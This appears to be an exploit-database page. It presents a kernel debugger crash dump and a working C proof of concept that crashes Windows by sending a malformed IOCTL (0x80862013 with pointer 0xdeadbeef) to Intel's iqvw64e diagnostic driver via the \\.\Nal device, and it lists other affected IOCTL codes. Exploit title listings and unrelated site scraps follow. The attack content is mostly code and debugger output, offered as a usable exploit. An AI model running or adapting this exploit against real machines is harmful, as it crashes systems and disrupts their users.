rax=0000f88005a696d1 rbx=000000007efdf000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=000000007efdb000 rdi=0000000000000000
rip=00000000773f1937 rsp=000000000021f3f0 rbp=0000000000000000
 r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000000021f4b0 r13=00000000773b0000
r14=0000000000000001 r15=000000007740a220
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
ntdll! ?? ::FNODOBFM::`string'+0x28ff0:
00000000`773f1937 89442430        mov     dword ptr [rsp+30h],eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
16 00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe
16 00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe
rax=0000f88005a696d1 rbx=000000000021f4b0 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000000
rip=00000000773dc34e rsp=000000000021f460 rbp=0000000000000000
 r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
ntdll!LdrInitializeThunk+0xe:
00000000`773dc34e b201            mov     dl,1
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
00 fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction

3: kd> dd fffff8800653b8d0
fffff880`0653b8d0  80862013 00000000 0653bb60 fffff880
fffff880`0653b8e0  4d1084d0 fffffa80 4d01e160 fffffa80
fffff880`0653b8f0  746c6644 00000000 0653b928 fffff880
fffff880`0653b900  0653b968 fffff880 00000000 00000000
fffff880`0653b910  00000000 00000000 00000001 00000000
fffff880`0653b920  4c804e01 00000000 4d1084d0 fffffa80
fffff880`0653b930  00000000 00000000 00000000 00000000
fffff880`0653b940  4d01e160 fffffa80 76bdd0af 00000000

3: kd> !process 0 0
**** NT ACTIVE PROCESS DUMP ****
PROCESS fffffa8048f5f740
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00187000  ObjectTable: fffff8a0000017f0  HandleCount: 535.
    Image: System
.
.
.

PROCESS fffffa804d0f29e0
    SessionId: 1  Cid: 0d9c    Peb: 7efdf000  ParentCid: 0afc
    DirBase: 1aac4b000  ObjectTable: fffff8a016893450  HandleCount:  13.
    Image: ConsoleApplication7.exe
.
.
.

3: kd> !handle fffffa804d0f29e0 7

PROCESS fffffa804d0f29e0
    SessionId: 1  Cid: 0d9c    Peb: 7efdf000  ParentCid: 0afc
    DirBase: 1aac4b000  ObjectTable: fffff8a016893450  HandleCount:  13.
    Image: ConsoleApplication7.exe

Handle table at fffff8a016893450 with 13 entries in use

Invalid Handle: 0x4d0f29e0

3: kd> !process fffffa804d0f29e0 f
PROCESS fffffa804d0f29e0
    SessionId: 1  Cid: 0d9c    Peb: 7efdf000  ParentCid: 0afc
    DirBase: 1aac4b000  ObjectTable: fffff8a016893450  HandleCount:  13.
    Image: ConsoleApplication7.exe
    VadRoot fffffa804a9eb220 Vads 30 Clone 0 Private 110. Modified 0. Locked 0.
    DeviceMap fffff8a0022b5570
    Token                             fffff8a01685d060
    ElapsedTime                       00:00:39.608
    UserTime                          00:00:00.000
    KernelTime                        00:00:00.000
    QuotaPoolUsage[PagedPool]         20128
    QuotaPoolUsage[NonPagedPool]      3360
    Working Set Sizes (now,min,max)  (510, 50, 345) (2040KB, 200KB, 1380KB)
    PeakWorkingSetSize                510
    VirtualSize                       11 Mb
    PeakVirtualSize                   11 Mb
    PageFaultCount                    529
    MemoryPriority                    BACKGROUND
    BasePriority                      8
    CommitCharge                      140
    Job                               fffffa804d0fc080

        THREAD fffffa804c800060  Cid 0d9c.0da0  Teb: 000000007efdb000 Win32Thread: 0000000000000000 RUNNING on processor 3
        IRP List:
            fffffa804d01e160: (0006,0118) Flags: 00060000  Mdl: 00000000
        Not impersonating
        DeviceMap                 fffff8a0022b5570
        Owning Process            fffffa804d0f29e0       Image:         ConsoleApplication7.exe
        Attached Process          N/A            Image:         N/A
        Wait Start TickCount      440956         Ticks: 0
        Context Switch Count      31             IdealProcessor: 3             
        UserTime                  00:00:00.000
        KernelTime                00:00:00.000
*** WARNING: Unable to verify checksum for ConsoleApplication7.exe
*** ERROR: Module load completed but symbols could not be loaded for ConsoleApplication7.exe
        Win32 Start Address ConsoleApplication7 (0x0000000000041354)
        Stack Init fffff8800653bc70 Current fffff8800653b530
        Base fffff8800653c000 Limit fffff88006536000 Call 0
        Priority 11 BasePriority 8 UnusualBoost 0 ForegroundBoost 2 IoPriority 2 PagePriority 5
        Child-SP          RetAddr           Call Site
        fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction
        fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12
        fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e
        fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104
        fffff880`0653a100 fffff800`036cad7c nt!KiBugCheckDispatch+0x69
        fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c
        fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd
        fffff880`0653a2b0 fffff800`037067b1 nt!RtlDispatchException+0x415
        fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135
        fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2
        fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a (TrapFrame @ fffff880`0653b210)
        fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2
        fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac
        fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607
        fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56
        fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13 (TrapFrame @ fffff880`0653bae0)
        00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9
        00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31
        00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa
        00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a
        00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3
        00000000`0021f3f0 00000000`773dc34e ntdll! ?? ::FNODOBFM::`string'+0x28ff0
        00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe


3: kd> !irp fffffa804d01e160
Irp is active with 1 stacks 1 is current (= 0xfffffa804d01e230)
 No Mdl: No System Buffer: Thread fffffa804c800060:  Irp stack trace.  
     cmd  flg cl Device   File     Completion-Context
>[  e, 0]   5  0 fffffa804aac7b00 fffffa804d1084d0 00000000-00000000    
	       \FileSystem\iqvw64e
			Args: 00000000 00000000 80862013 deadbeef

3: kd> !object fffffa804aac7b00
Object: fffffa804aac7b00  Type: (fffffa804900af30) Device
    ObjectHeader: fffffa804aac7ad0 (new version)
    HandleCount: 0  PointerCount: 2
    Directory Object: fffff8a000010060  Name: Nal

3: kd> dt_IO_STACK_LOCATION 0xfffffa804d01e230
ntdll!_IO_STACK_LOCATION
   +0x000 MajorFunction    : 0xe ''
   +0x001 MinorFunction    : 0 ''
   +0x002 Flags            : 0x5 ''
   +0x003 Control          : 0 ''
   +0x008 Parameters       : <unnamed-tag>
   +0x028 DeviceObject     : 0xfffffa80`4aac7b00 _DEVICE_OBJECT
   +0x030 FileObject       : 0xfffffa80`4d1084d0 _FILE_OBJECT
   +0x038 CompletionRoutine : (null) 
   +0x040 Context          : (null) 

3: kd> !devobj 0xfffffa80`4aac7b00 7
Device object (fffffa804aac7b00) is for:
 Nal \FileSystem\iqvw64e DriverObject fffffa804b0f4d70
Current Irp 00000000 RefCount 1 Type 00008086 Flags 00000044
Dacl fffff9a10008c391 DevExt fffffa804aac7c50 DevObjExt fffffa804aac7c68 
ExtensionFlags (0x00000800)  DOE_DEFAULT_SD_PRESENT
Characteristics (0000000000)  
Device queue is not busy.

3: kd> !drvobj fffffa804b0f4d70 7
Driver object (fffffa804b0f4d70) is for:
 \FileSystem\iqvw64e
Driver Extension List: (id , addr)

Device Object list:
fffffa804aac7b00  

DriverEntry:   fffff88005fda200	iqvw64e
DriverStartIo: 00000000	
DriverUnload:  fffff88005a09010	iqvw64e
AddDevice:     00000000	

Dispatch routines:
[00] IRP_MJ_CREATE                      fffff88005a09090	iqvw64e+0x1090
[01] IRP_MJ_CREATE_NAMED_PIPE           fffff800036b0e30	nt!IopInvalidDeviceRequest
[02] IRP_MJ_CLOSE                       fffff88005a090f0	iqvw64e+0x10f0
[03] IRP_MJ_READ                        fffff800036b0e30	nt!IopInvalidDeviceRequest
[04] IRP_MJ_WRITE                       fffff800036b0e30	nt!IopInvalidDeviceRequest
[05] IRP_MJ_QUERY_INFORMATION           fffff800036b0e30	nt!IopInvalidDeviceRequest
[06] IRP_MJ_SET_INFORMATION             fffff800036b0e30	nt!IopInvalidDeviceRequest
[07] IRP_MJ_QUERY_EA                    fffff800036b0e30	nt!IopInvalidDeviceRequest
[08] IRP_MJ_SET_EA                      fffff800036b0e30	nt!IopInvalidDeviceRequest
[09] IRP_MJ_FLUSH_BUFFERS               fffff800036b0e30	nt!IopInvalidDeviceRequest
[0a] IRP_MJ_QUERY_VOLUME_INFORMATION    fffff800036b0e30	nt!IopInvalidDeviceRequest
[0b] IRP_MJ_SET_VOLUME_INFORMATION      fffff800036b0e30	nt!IopInvalidDeviceRequest
[0c] IRP_MJ_DIRECTORY_CONTROL           fffff800036b0e30	nt!IopInvalidDeviceRequest
[0d] IRP_MJ_FILE_SYSTEM_CONTROL         fffff800036b0e30	nt!IopInvalidDeviceRequest
[0e] IRP_MJ_DEVICE_CONTROL              fffff88005a09150	iqvw64e+0x1150
[0f] IRP_MJ_INTERNAL_DEVICE_CONTROL     fffff800036b0e30	nt!IopInvalidDeviceRequest
[10] IRP_MJ_SHUTDOWN                    fffff800036b0e30	nt!IopInvalidDeviceRequest
[11] IRP_MJ_LOCK_CONTROL                fffff800036b0e30	nt!IopInvalidDeviceRequest
[12] IRP_MJ_CLEANUP                     fffff800036b0e30	nt!IopInvalidDeviceRequest
[13] IRP_MJ_CREATE_MAILSLOT             fffff800036b0e30	nt!IopInvalidDeviceRequest
[14] IRP_MJ_QUERY_SECURITY              fffff800036b0e30	nt!IopInvalidDeviceRequest
[15] IRP_MJ_SET_SECURITY                fffff800036b0e30	nt!IopInvalidDeviceRequest
[16] IRP_MJ_POWER                       fffff800036b0e30	nt!IopInvalidDeviceRequest
[17] IRP_MJ_SYSTEM_CONTROL              fffff800036b0e30	nt!IopInvalidDeviceRequest
[18] IRP_MJ_DEVICE_CHANGE               fffff800036b0e30	nt!IopInvalidDeviceRequest
[19] IRP_MJ_QUERY_QUOTA                 fffff800036b0e30	nt!IopInvalidDeviceRequest
[1a] IRP_MJ_SET_QUOTA                   fffff800036b0e30	nt!IopInvalidDeviceRequest
[1b] IRP_MJ_PNP                         fffff800036b0e30	nt!IopInvalidDeviceRequest


*/

#include <windows.h>
#include <stdio.h>
#include <conio.h>

int main(int argc, char **argv)
{
	HANDLE   hDevice;
	DWORD    bret;
	char     szDevice[] = "\\\\.\\Nal";

	printf("--[ Intel Network Adapter Diagnostic Driver DoS ]--\n");

	printf("Opening handle to driver..\n");
	// CreateFile(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDispoition, dwFlagsAndAttributes, hTemplateFile)
	if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE)	{
		printf("Device %s succesfully opened!\n", szDevice);
		printf("\tHandle: %p\n", hDevice);
	}
	else
	{
		printf("Error: Error opening device %s\n", szDevice);
	}

	printf("\nPress any key to DoS..");
	_getch();

	bret = 0;
	// Affected IOCTL codes: 0x80862013, 0x8086200B, 0x8086200F, 0x80862007
	// DeviceIoControl(hDevice, dwIoControlCode, lpInBuffer, nInBufferSize, lpOutBuffer, nOutBufferSize, lpBytesReturned, lpOverlapped)
	if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL))
	{
		printf("DeviceIoControl Error - bytes returned %#x\n", bret);
	}

	CloseHandle(hDevice);
	return 0;
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2017-12-27 "DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)" webapps aspx "Glafkos Charalambous"
2015-09-08 "Cisco Sourcefire User Agent 2.2 - Insecure File Permissions" local windows "Glafkos Charalambous"
2015-03-14 "Intel Network Adapter Diagnostic Driver - IOCTL Handling" dos windows "Glafkos Charalambous"
2015-01-22 "Cisco Ironport Appliances - Privilege Escalation" remote hardware "Glafkos Charalambous"
2014-10-22 "DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit)" webapps windows "Glafkos Charalambous"
2014-10-22 "iBackup 10.0.0.32 - Local Privilege Escalation" local windows "Glafkos Charalambous"
2013-06-24 "Alienvault Open Source SIEM (OSSIM) 4.1 - Multiple SQL Injection Vulnerabilities" webapps php "Glafkos Charalambous"
2012-09-20 "Thomson Wireless VoIP Cable Modem - Authentication Bypass" webapps hardware "Glafkos Charalambous"
2011-06-04 "OpenDrive 1.3.141 - Local Password Disclosure" local windows "Glafkos Charalambous"
2011-06-04 "Xitami Web Server 2.5b4 - Remote Buffer Overflow (Egghunter)" remote windows "Glafkos Charalambous"
2010-08-25 "Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-24 "TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-24 "Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-24 "Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-17 "Triologic Media Player 8 - '.m3u' Universal Unicode Local Buffer Overflow (SEH)" local windows "Glafkos Charalambous"
2010-08-16 "MUSE 4.9.0.006 - '.m3u' Local Buffer Overflow" local windows "Glafkos Charalambous"
2010-08-16 "MUSE 4.9.0.006 - '.pls' Universal Local Buffer Overflow (SEH)" local windows "Glafkos Charalambous"
2010-08-11 "EasyFTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflows" remote windows "Glafkos Charalambous"
2009-01-11 "DZcms 3.1 - SQL Injection" webapps php "Glafkos Charalambous"
2008-11-24 "WebStudio CMS - Blind SQL Injection" webapps php "Glafkos Charalambous"
2007-06-07 "WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Glafkos Charalambous"
2007-06-04 "WebStudio CMS - 'index.php' Cross-Site Scripting" webapps php "Glafkos Charalambous"
2007-06-01 "Evenzia Content Management Systems (CMS) - Cross-Site Scripting" webapps php "Glafkos Charalambous" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected